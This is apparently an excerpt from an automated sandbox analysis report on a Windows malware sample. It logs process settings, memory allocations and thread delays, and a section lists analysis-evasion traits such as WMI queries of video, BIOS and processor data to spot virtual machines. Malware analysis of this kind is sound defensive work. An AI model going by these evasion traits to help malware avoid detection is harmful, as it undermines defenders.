            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\brokermonitordhcp\portruntime.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: 1B530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: F40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: 1AAF0000 memory reserve | memory write watchJump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: 2760000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeMemory allocated: 1A860000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\portruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599454Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599329Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599204Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599079Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 598954Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeWindow / User API: threadDelayed 876Jump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeWindow / User API: threadDelayed 1257Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWindow / User API: threadDelayed 367Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWindow / User API: threadDelayed 1325Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWindow / User API: threadDelayed 1289Jump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeWindow / User API: threadDelayed 549
            Source: C:\brokermonitordhcp\portruntime.exe TID: 6436Thread sleep count: 876 > 30Jump to behavior
            Source: C:\brokermonitordhcp\portruntime.exe TID: 6436Thread sleep count: 1257 > 30Jump to behavior
            Source: C:\brokermonitordhcp\portruntime.exe TID: 1660Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 4532Thread sleep count: 367 > 30Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2032Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220Thread sleep count: 1325 > 30Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220Thread sleep count: 1289 > 30Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599454s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599329s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599204s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -599079s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944Thread sleep time: -598954s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2092Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2860Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 7080Thread sleep count: 549 > 30
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 1920Thread sleep count: 262 > 30
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6416Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\brokermonitordhcp\portruntime.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A5F4
